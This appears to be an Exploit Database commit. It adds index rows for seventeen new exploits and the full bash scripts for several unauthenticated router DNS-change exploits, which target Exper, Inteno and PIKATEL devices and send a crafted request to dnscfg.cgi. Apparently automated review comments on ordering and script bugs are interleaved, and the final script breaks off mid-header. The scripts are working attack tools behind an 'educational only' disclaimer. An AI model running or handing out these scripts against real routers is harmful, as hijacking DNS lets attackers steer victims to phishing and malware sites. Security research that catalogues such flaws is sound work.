DB: 2016-09-14

17 new exploits

Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script
Cherry Music 0.35.1 - Arbitrary File Disclosure
Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation
Windows x86 - Password Protected TCP Bind Shell (637 bytes)
wdCalendar 2 - SQL Injection
Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change
Open-Xchange App Suite 7.8.2 - Cross Site Scripting
Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting
Multiple Icecream Apps - Insecure File Permissions Privilege Escalation
WinSMS 3.43 - Insecure File Permissions Privilege Escalation
Microsoft Internet Explorer 11.0.9600.18482 - Use After Free
AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure
AIOCP 1.3.x - Multiple Vulnerabilities
ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change
COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change
Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change
PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change
PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change
Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
Offensive Security 2016-09-14 05:08:39 +00:00
parent 28e25eeea1
commit d5138d6962
21 changed files with 1943 additions and 15 deletions


@ -17745,7 +17745,6 @@ id,file,description,date,author,platform,type,port
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0
20416,platforms/php/webapps/20416.txt,"WordPress Plugin Mz-jajak 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
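Review bot: the hunk header counts 7 lines before and 6 after, so exactly one row is removed here, but the rendered view has dropped the `-`/`+` markers. The only row out of id order is 20424 (sitting between 20414 and 20416, dated 2000-11-22), so it reads as the removed row. Since the commit title lists "Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script" among the new entries, confirm that the row is re-added at its proper position elsewhere rather than dropped from the index while platforms/windows/remote/20424.txt stays in the tree.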
@ -18949,6 +18948,12 @@ id,file,description,date,author,platform,type,port
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
40361,platforms/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,php,webapps,80
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
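Review bot: the new ids run 40361, 40362, 40363, 40364, 40365, 40367, with 40366 missing, while 40368 onwards appear in later hunks; if 40366 was withdrawn, say so in the commit message so the gap is not mistaken for a forgotten row. The six rows are inserted after 40347 in the middle of the 2002 block, which matches how 40347 was placed, but it shows the file is not kept in id order, and that makes duplicate ids hard to spot by eye.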
@ -25454,6 +25459,7 @@ id,file,description,date,author,platform,type,port
28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0
28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
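Review bot: the author field of the 40378 row reads "Jakub A>>oczek", which looks like a mis-encoded non-ASCII name (the `A>>` pattern is typical of a UTF-8 sequence that was re-encoded); check the source advisory for the intended spelling and store the row as UTF-8 so the name renders correctly. Also, 40378 is a webapps entry with port 0, whereas the other webapps rows added in this commit (40361, 40364, 40367) carry 80; pick one convention for web-interface entries.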
@ -25565,6 +25571,7 @@ id,file,description,date,author,platform,type,port
28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - open_tickets.php ticket_id Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0
28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
@ -25658,6 +25665,7 @@ id,file,description,date,author,platform,type,port
28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0
40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0
28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
@ -25727,6 +25735,7 @@ id,file,description,date,author,platform,type,port
28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
40375,platforms/windows/local/40375.txt,"WinSMS 3.43 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0
28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0
28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0
@ -25900,6 +25909,7 @@ id,file,description,date,author,platform,type,port
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0
28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0
@ -25973,7 +25983,7 @@ id,file,description,date,author,platform,type,port
28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",php,webapps,0
28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0
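Review bot: id 28935 appears on two rows with the same file path and different descriptions; the header's 7-to-7 count shows this is a one-line replacement, and in unified-diff order the removed row ("'cp_dpage.php' Full Path Disclosure") precedes the added one ("Multiple Vulnerabilities"), but the rendered view has lost the markers, so a reader sees what looks like a duplicate id. The commit message lists both descriptions under "new exploits", which is misleading for a retitle; describe it as a rename of 28935 instead.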
@ -26030,6 +26040,7 @@ id,file,description,date,author,platform,type,port
28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
40373,platforms/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80
@ -26137,6 +26148,7 @@ id,file,description,date,author,platform,type,port
29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
@ -26232,6 +26244,7 @@ id,file,description,date,author,platform,type,port
29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0
29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
@ -26341,6 +26354,7 @@ id,file,description,date,author,platform,type,port
29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0
29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0
29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0
40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0
29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0
29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0
@ -26423,6 +26437,7 @@ id,file,description,date,author,platform,type,port
29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - admin/delete_member.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - admin/index.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - admin/list_members.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
40369,platforms/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - admin/send_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - include/config.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
@ -26493,6 +26508,7 @@ id,file,description,date,author,platform,type,port
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information Disclosure",2007-01-17,DPR,windows,remote,0
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote,0

platforms/cgi/webapps/40367.sh Executable file

@ -0,0 +1,82 @@
#!/bin/bash
#
# Exper EWM-01 ADSL/MODEM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Exper EWM-01 ADSL MODEM/ROUTER"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
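Review bot: the final line passes a stray `0` to GET and then throws away both the output and the exit status (`0&> /dev/null <&1`), so the script can never report whether the device accepted the request, and every early exit is a bare `exit;` that returns 0, so a caller cannot tell "libwww-perl not found" from a normal run. Use `exit 1` on the error paths and drop the `0`; the `-e` flag (print response headers) is also dead while everything goes to /dev/null. Missing documentation: the header gives no affected firmware version, no vendor notification or fix status, and the whole Description block is generic DNS-changer impact text rather than anything about this device's dnscfg.cgi handler, which is what a defender needs to judge exposure.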

platforms/cgi/webapps/40368.sh Executable file

@ -0,0 +1,82 @@
#!/bin/bash
#
# Inteno EG101R1 VoIP Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Inteno EG101R1 VoIP Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
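Review bot: apart from the banner strings, this file is identical to 40367.sh (same `dnscfg.cgi` query, same argument handling, same stray `0` argument and discarded exit status on the final line), so every defect there is duplicated here. What is specific to the Inteno EG101R1 is absent: the firmware build it was tested on and whether the CGI answers only on the LAN side or also on the WAN interface, which is the single fact that decides how exposed an owner of this router is.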

platforms/cgi/webapps/40369.sh Executable file

@ -0,0 +1,81 @@
#!/bin/bash
#
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
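Review bot: `GET=\`which GET 2>/dev/null\`` assigns a variable that is never read (the final line calls `GET` directly), and the test relies on `which`, whose exit status is not consistent across implementations; `command -v GET >/dev/null 2>&1` is the portable builtin check. This file also differs in layout from the other five (device names and exploit title on one comment line, giving 81 lines instead of 82), which is harmless but shows the files are hand-edited copies; a header line stating which of the two models (96338WS, 96338L-2M-8M) was actually tested would be more useful than the duplicated generic Description.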

platforms/cgi/webapps/40370.sh Executable file

@ -0,0 +1,82 @@
#!/bin/bash
#
# PLANET VDR-300NU ADSL ROUTER
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
